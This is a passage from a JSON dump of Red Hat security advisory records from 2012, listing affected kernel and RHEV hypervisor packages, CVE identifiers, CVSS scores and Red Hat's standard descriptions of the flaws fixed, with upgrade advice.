"kernel-headers-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-238.45.1.el5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-PAE", "packageFilename": "kernel-PAE-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel", "packageFilename": "kernel-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-PAE-devel", "packageFilename": "kernel-PAE-devel-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\n* A buffer overflow flaw was found in the hfs_bnode_read() function in the\nHFS Plus (HFS+) file system implementation in the Linux kernel. A local\nuser able to mount a specially-crafted HFS+ file system image could use\nthis flaw to cause a denial of service or escalate their privileges.\n(CVE-2012-2319, Low)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nCVE-2012-3412.\n\nThis update also fixes the following bug:\n\n* Some subsystems clear the TIF_SIGPENDING flag during error handling in\nfork() paths. Previously, if the flag was cleared, the ERESTARTNOINTR error\ncode could be returned. The underlying source code has been modified so\nthat the error code is no longer returned. (BZ#855754)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "reporter": "RedHat", "published": "2012-10-09T04:00:00", "type": "redhat", "title": "(RHSA-2012:1347) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-2319", "CVE-2012-3412"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:06:49", "id": "RHSA-2012:1347", "href": "https://access.redhat.com/errata/RHSA-2012:1347", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-06-13T00:00:20", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.3-20121012.0.el6_3", "arch": "noarch", "packageName": "rhev-hypervisor6", "packageFilename": "rhev-hypervisor6-6.3-20121012.0.el6_3.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.3-20121012.0.el6_3", "arch": "noarch", "packageName": "rhev-hypervisor6-tools", "packageFilename": "rhev-hypervisor6-tools-6.3-20121012.0.el6_3.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.3-20121012.0.el6_3", "arch": "src", "packageName": "rhev-hypervisor6", "packageFilename": "rhev-hypervisor6-6.3-20121012.0.el6_3.src.rpm", "operator": "lt"}], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way socket buffers (skb) requiring TSO (TCP segment\noffloading) were handled by the sfc driver. If the skb did not fit within\nthe minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nthis issue.\n\nThis updated package provides updated components that include a fix for\none security issue. This issue had no security impact on Red Hat Enterprise\nVirtualization Hypervisor itself, however. The security fix included in\nthis update addresses the following CVE number:\n\nCVE-2012-4423 (libvirt issue)\n\nThis update also fixes the following bug:\n\n* A dependency issue was found between the rhev-hypervisor-tools and\nrhev-hypervisor6-tools packages. Every time a user with one of the -tools\npackages installed ran \"yum update\", the -tools package they had installed\nwas removed and the other one installed. Even though rhev-hypervisor-tools\nobsoleted rhev-hypervisor6-tools, this update includes an updated\nrhev-hypervisor6-tools package that corrects this issue. Note that the\npackage does not have meaningful content, is only here to fix the\ndependency issue, and may be removed by a future update. (BZ#855391)\n\nThis update includes the ovirt-node build from RHBA-2012:1374:\n\nhttps://rhn.redhat.com/errata/RHBA-2012-1374.html\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "reporter": "RedHat", "published": "2012-10-18T04:00:00", "type": "redhat", "title": "(RHSA-2012:1375) Important: rhev-hypervisor6 security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412", "CVE-2012-4423"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:59:45", "id": "RHSA-2012:1375", "href": "https://access.redhat.com/errata/RHSA-2012:1375", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-05-25T03:52:07", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.8-20120919.0.el5_8", "arch": "noarch", "packageName": "rhev-hypervisor5", "packageFilename": "rhev-hypervisor5-5.8-20120919.0.el5_8.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.8-20120919.0.el5_8", "arch": "noarch", "packageName": "rhev-hypervisor5-tools", "packageFilename": "rhev-hypervisor5-tools-5.8-20120919.0.el5_8.noarch.rpm", "operator": "lt"}], "description": "The rhev-hypervisor5 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way socket buffers (skb) requiring TSO (TCP segment\noffloading) were handled by the sfc driver. If the skb did not fit within\nthe minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nthis issue.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2012-4244 (bind issue)\n\nCVE-2012-2319, CVE-2012-3430, and CVE-2012-3510 (kernel issues)\n\nCVE-2011-3102, CVE-2012-0841, and CVE-2012-2807 (libxml2 issues)\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "reporter": "RedHat", "published": "2012-10-02T04:00:00", "type": "redhat", "title": "(RHSA-2012:1324) Important: rhev-hypervisor5 security and bug fix update", "enchantments": {"score": {"modified": "2018-05-25T03:52:07", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3102", "CVE-2012-0841", "CVE-2012-2319", "CVE-2012-2807", "CVE-2012-3412", "CVE-2012-3430", "CVE-2012-3510", "CVE-2012-4244"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-25T06:35:58", "id": "RHSA-2012:1324", "href": "https://access.redhat.com/errata/RHSA-2012:1324", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-06-07T05:59:00", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-debuginfo", "packageFilename": "kernel-rt-debuginfo-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-debug-debuginfo", "packageFilename": "kernel-rt-debug-debuginfo-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-debuginfo-common-x86_64", "packageFilename": "kernel-rt-debuginfo-common-x86_64-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-trace-debuginfo", "packageFilename": "kernel-rt-trace-debuginfo-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-vanilla-debuginfo", "packageFilename": "kernel-rt-vanilla-debuginfo-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "src", "packageName": "kernel-rt", "packageFilename": "kernel-rt-3.2.33-rt50.66.el6rt.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "noarch", "packageName": "mrg-rt-release", "packageFilename": "mrg-rt-release-3.2.33-rt50.66.el6rt.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "noarch", "packageName": "kernel-rt-doc", "packageFilename": "kernel-rt-doc-3.2.33-rt50.66.el6rt.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "noarch", "packageName": "kernel-rt-firmware", "packageFilename": "kernel-rt-firmware-3.2.33-rt50.66.el6rt.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt", "packageFilename": "kernel-rt-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-debug", "packageFilename": "kernel-rt-debug-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-debug-devel", "packageFilename": "kernel-rt-debug-devel-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-devel", "packageFilename": "kernel-rt-devel-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-trace", "packageFilename": "kernel-rt-trace-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-vanilla", "packageFilename": "kernel-rt-vanilla-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-trace-devel", "packageFilename": "kernel-rt-trace-devel-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.2.33-rt50.66.el6rt", "arch": "x86_64", "packageName": "kernel-rt-vanilla-devel", "packageFilename": "kernel-rt-vanilla-devel-3.2.33-rt50.66.el6rt.x86_64.rpm", "operator": "lt"}], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way Netlink messages without SCM_CREDENTIALS\n(used for authentication) data set were handled. When not explicitly set,\nthe data was sent but with all values set to 0, including the process ID\nand user ID, causing the Netlink message to appear as if it were sent with\nroot privileges. A local, unprivileged user could use this flaw to send\nspoofed Netlink messages to an application, possibly resulting in the\napplication performing privileged operations if it relied on\nSCM_CREDENTIALS data for the authentication of Netlink messages.\n(CVE-2012-3520, Important)\n\n* A race condition was found in the way asynchronous I/O and fallocate()\ninteracted when using the ext4 file system. A local, unprivileged user\ncould use this flaw to expose random data from an extent whose data blocks\nhave not yet been written, and thus contain data from a deleted file.\n(CVE-2012-4508, Important)\n\n* A use-after-free flaw was found in the Linux kernel's memory management\nsubsystem in the way quota handling for huge pages was performed. A local,\nunprivileged user could use this flaw to cause a denial of service or,\npotentially, escalate their privileges. (CVE-2012-2133, Moderate)\n\n* A use-after-free flaw was found in the madvise() system call\nimplementation in the Linux kernel. A local, unprivileged user could use\nthis flaw to cause a denial of service or, potentially, escalate their\nprivileges. (CVE-2012-3511, Moderate)\n\n* A divide-by-zero flaw was found in the TCP Illinois congestion control\nalgorithm implementation in the Linux kernel. If the TCP Illinois\ncongestion control algorithm were in use (the sysctl\nnet.ipv4.tcp_congestion_control variable set to \"illinois\"), a local,\nunprivileged user could trigger this flaw and cause a denial of service.\n(CVE-2012-4565, Moderate)\n\n* An information leak flaw was found in the uname() system call\nimplementation in the Linux kernel. A local, unprivileged user could use\nthis flaw to leak kernel stack memory to user-space by setting the UNAME26\npersonality and then calling the uname() system call. (CVE-2012-0957, Low)\n\n* Buffer overflow flaws were found in the udf_load_logicalvol() function in\nthe Universal Disk Format (UDF) file system implementation in the Linux\nkernel. An attacker with physical access to a system could use these flaws\nto cause a denial of service or escalate their privileges. (CVE-2012-3400,\nLow)\n\n* A flaw was found in the way the msg_namelen variable in the rds_recvmsg()\nfunction of the Linux kernel's Reliable Datagram Sockets (RDS) protocol\nimplementation was initialized. A local, unprivileged user could use this\nflaw to leak kernel stack memory to user-space. (CVE-2012-3430, Low)\n\nRed Hat would like to thank Pablo Neira Ayuso for reporting CVE-2012-3520;\nTheodore Ts'o for reporting CVE-2012-4508; Shachar Raindel for reporting\nCVE-2012-2133; and Kees Cook for reporting CVE-2012-0957. Upstream\nacknowledges Dmitry Monakhov as the original reporter of CVE-2012-4508. The\nCVE-2012-4565 issue was discovered by Rodrigo Freire of Red Hat, and the\nCVE-2012-3430 issue was discovered by the Red Hat InfiniBand team.\n\nThis update also fixes multiple bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which upgrade the kernel-rt\nkernel to version kernel-rt-3.2.33-rt50, and correct these issues. The\nsystem must be rebooted for this update to take effect.\n", "reporter": "RedHat", "published": "2012-12-04T05:00:00", "type": "redhat", "title": "(RHSA-2012:1491) Important: kernel-rt security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-0957", "CVE-2012-2133", "CVE-2012-3400", "CVE-2012-3430", "CVE-2012-3511", "CVE-2012-3520", "CVE-2012-4508", "CVE-2012-4565"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:58:29", "id": "RHSA-2012:1491", "href": "https://access.redhat.com/errata/RHSA-2012:1491", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:19:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-debuginfo-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-PAE-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-debuginfo-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-xen-debuginfo-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-debuginfo-common-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-debuginfo-common", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-348.18.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel-debuginfo-common", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-debuginfo-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-debuginfo-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i386", "packageFilename": "kernel-headers-2.6.18-348.18.1.el5.i386.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-devel-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-PAE-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-debug-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-PAE", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-devel-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-xen-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageFilename": "kernel-xen-devel-2.6.18-348.18.1.el5.i686.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-348.18.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-devel-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.18-348.18.1.el5.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-debuginfo-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-kdump-debuginfo-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel-kdump-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-debuginfo-common-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel-debuginfo-common", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-debug-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-debug-devel-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-devel-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-kdump-devel-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel-kdump-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc", "packageFilename": "kernel-headers-2.6.18-348.18.1.el5.ppc.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-headers-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "ppc64", "packageFilename": "kernel-kdump-2.6.18-348.18.1.el5.ppc64.rpm", "packageName": "kernel-kdump", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-kdump-debuginfo-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel-kdump-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-debuginfo-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-debuginfo-common-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel-debuginfo-common", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-debug-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-kdump-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel-kdump", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "s390x", "packageFilename": "kernel-debug-devel-2.6.18-348.18.1.el5.s390x.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", 